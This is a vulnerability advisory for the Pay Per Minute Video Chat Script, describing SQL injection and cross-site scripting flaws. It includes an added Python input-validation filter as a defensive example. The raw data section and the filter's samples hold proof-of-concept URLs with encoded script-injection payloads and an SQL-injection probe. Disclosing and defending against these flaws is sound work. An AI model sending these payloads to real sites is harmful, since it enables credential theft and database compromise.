Vendor: Pay Per Minute Video Chat Script
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection), 79 (Cross-Site Scripting)
Product Name: Pay Per Minute Video Chat Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Pay Per Minute Video Chat Script SQL Injection and Cross-Site Scripting Vulnerabilities

The Pay Per Minute Video Chat Script is vulnerable to SQL injection and multiple cross-site scripting (XSS) attacks. The application fails to properly sanitize user-supplied input, allowing an attacker to execute arbitrary SQL queries or inject malicious scripts into web pages.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, web application firewalls can be used to detect and block SQL injection and XSS attacks.
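
An added example (not part of the advisory or the vendor's code) of the allowlist validation recommended above, applied to the three parameters named in the proof-of-concept URLs below. The expected formats for `id`, `model` and `page` are assumptions, since the advisory does not state them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allowlist per script and parameter. The formats are assumptions (the
# advisory does not state them): numeric id/page, short alphanumeric model.
RULES = {
    "memberviewdetails.php": {"id": re.compile(r"[0-9]{1,10}")},
    "videos.php": {"model": re.compile(r"[A-Za-z0-9_-]{1,64}")},
    "index_ie.php": {"page": re.compile(r"[0-9]{1,6}")},
}


def check_request(url):
    """Return (parameter, decoded value) pairs that fail the allowlist."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    rules = RULES.get(script, {})
    # parse_qs percent-decodes values, so encoded markup is matched decoded.
    query = parse_qs(parts.query, keep_blank_values=True)
    violations = []
    for name, pattern in rules.items():
        # Every occurrence is checked, so a repeated parameter cannot hide one.
        for value in query.get(name, []):
            if not pattern.fullmatch(value):
                violations.append((name, value))
    return violations


# The first three URLs are the ones listed in the advisory; the last two are
# constructed benign requests.
SAMPLES = [
    "http://www.example.com/P47H/admin/memberviewdetails.php"
    "?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E",
    "http://www.example.com/P47H/videos.php"
    "?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E",
    "http://www.example.com/P47H/index_ie.php?page=-666",
    "http://www.example.com/P47H/index_ie.php?page=2",
    "http://www.example.com/P47H/videos.php?model=anna_01",
]

if __name__ == "__main__":
    for url in SAMPLES:
        bad = check_request(url)
        print("BLOCK" if bad else "ALLOW", url.split("?")[0], [n for n, _ in bad])
```

The same patterns belong in the PHP handlers themselves, together with parameterized queries and output encoding; a filter in front of the application only narrows what reaches them.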

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40585/info

Pay Per Minute Video Chat Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Cross-site scripting:

http://www.example.com/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
 
http://www.example.com/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E


SQL-injection:

http://www.example.com/P47H/index_ie.php?page=-666